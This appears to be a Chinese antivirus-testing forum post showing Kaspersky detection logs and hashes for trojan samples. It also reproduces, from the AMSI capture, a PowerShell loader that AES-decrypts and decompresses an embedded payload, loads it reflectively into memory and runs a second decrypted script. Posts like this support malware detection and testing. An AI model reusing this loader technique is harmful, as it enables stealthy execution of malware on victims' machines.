本帖最后由 DisaPDB 于 2024-3-23 23:27 编辑
Kaspersky scan 2x
2.cmd AMSI kill- 事件: 检测到恶意对象
- 用户: DESKTOP-7PJ65GJ\mac
- 用户类型: 发起者
- 应用程序名称: powershell.exe
- 应用程序路径: C:\Windows\SysWOW64\WindowsPowerShell\v1.0
- 组件: AMSI 保护
- 结果说明: 检测到
- 类型: 木马
- 名称: HEUR:Trojan.Win32.Generic
- 精确度: 启发式分析
- 威胁级别: 高
- 对象类型: 字符串
- 对象名称: amsi_stream_27
- 对象路径: uid://
- 对象的 SHA256: E3F45870BE3F2313E974A3C9C0455FF9E9CD6B8F2142943D6FF26348C838F433
- 对象的 MD5: E5FFD5AE4CBA50E03AE621A83E740BFA
- 原因: 专家分析
- 数据库发布日期: 2024/3/17 上午6:34:00
复制代码- $host.UI.RawUI.WindowTitle = 'C:\lbtxixe\2.cmd'
- $KUZI = @('Ele', 'Sbplr', 'Dcxecompres', 'Enzdtnt', 'CDKroTDKRro', 'Crematem', 'Lqoad', 'Fibromas6S4string', 'MIkMWnodul', 'GEhZzCEzurProces', 'InvYokV', 'ChalJqNgeNextion', 'ReaLiken', 'TyKjzranyformBlyock')
- function DecryptAES($encryptedData){
- $aes = [System.Security.Cryptography.Aes]::Create()
- $aes.Mode = [System.Security.Cryptography.CipherMode]::CBC
- $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
- $aes.Key = [System.Convert]::FromBase64String('TYzwx+VQruSBclwTSei5OE5DbGGUAEnGVbMuihV8YQU=')
- $aes.IV = [System.Convert]::FromBase64String('+LTXnHvK40EXoqLlqGzCsw==')
-
- $decryptor = $aes.CreateDecryptor()
- $decryptedData = $decryptor.TransformFinalBlock($encryptedData, 0, $encryptedData.Length)
-
- $decryptor.Dispose()
- $aes.Dispose()
-
- return $decryptedData
- }
- function Decompress($compressedData){
- $memoryStreamIn = New-Object System.IO.MemoryStream, $compressedData
- $memoryStreamOut = New-Object System.IO.MemoryStream
- $gzipStream = New-Object System.IO.Compression.GZipStream($memoryStreamIn, [IO.Compression.CompressionMode]::Decompress)
- $gzipStream.CopyTo($memoryStreamOut)
-
- $gzipStream.Dispose()
- $memoryStreamIn.Dispose()
- $memoryStreamOut.Dispose()
-
- return $memoryStreamOut.ToArray()
- }
- $encryptedAssembly = [System.IO.File]::ReadAllBytes([Console]::Title)
- $decryptedAssembly = Decompress(DecryptAES([System.Linq.Enumerable]::Skip($encryptedAssembly, 5).Substring(2)))
- [System.Reflection.Assembly]::Load($decryptedAssembly).EntryPoint.Invoke($null, $null)
- $encryptedScript = [System.IO.File]::ReadAllBytes([Console]::Title)
- $decryptedScript = Decompress(DecryptAES([System.Linq.Enumerable]::Skip($encryptedScript, 6).Substring(2)))
- Invoke-Expression -Command $decryptedScript
复制代码
- 事件: 检测到恶意对象
- 用户: DESKTOP-7PJ65GJ\mac
- 用户类型: 发起者
- 组件: 恶意软件扫描
- 结果: 检测到
- 结果说明: 检测到
- 类型: 木马
- 名称: HEUR:Trojan.Script.Generic
- 精确度: 启发式分析
- 威胁级别: 高
- 对象类型: 文件
- 对象名称: 1.js
- 对象路径: C:\Users\mac\Desktop\3
- 对象的 SHA256: 1A09632B975BE4725612E9E839691638A5519B2D0F62926156F9BC04ADBD25A3
- 对象的 MD5: C43E09B054BDBC559F99F18314AB21AF
- 原因: 专家分析
- 数据库发布日期: 2024/3/17 上午6:34:00
复制代码- 事件: 检测到恶意对象
- 用户: DESKTOP-7PJ65GJ\mac
- 用户类型: 发起者
- 组件: 恶意软件扫描
- 结果: 检测到
- 结果说明: 检测到
- 类型: 木马
- 名称: HEUR:Trojan.BAT.Setter.gen
- 精确度: 启发式分析
- 威胁级别: 高
- 对象类型: 文件
- 对象名称: 3.bat
- 对象路径: C:\Users\mac\Desktop\3
- 对象的 SHA256: B17BB3ACFDBDC750BC117C6E973019D71F6F182B64ED4E680746AC6604158C18
- 对象的 MD5: 223072360201FB722BF71754187D6146
- 原因: 专家分析
- 数据库发布日期: 2024/3/17 上午6:34:00
复制代码
|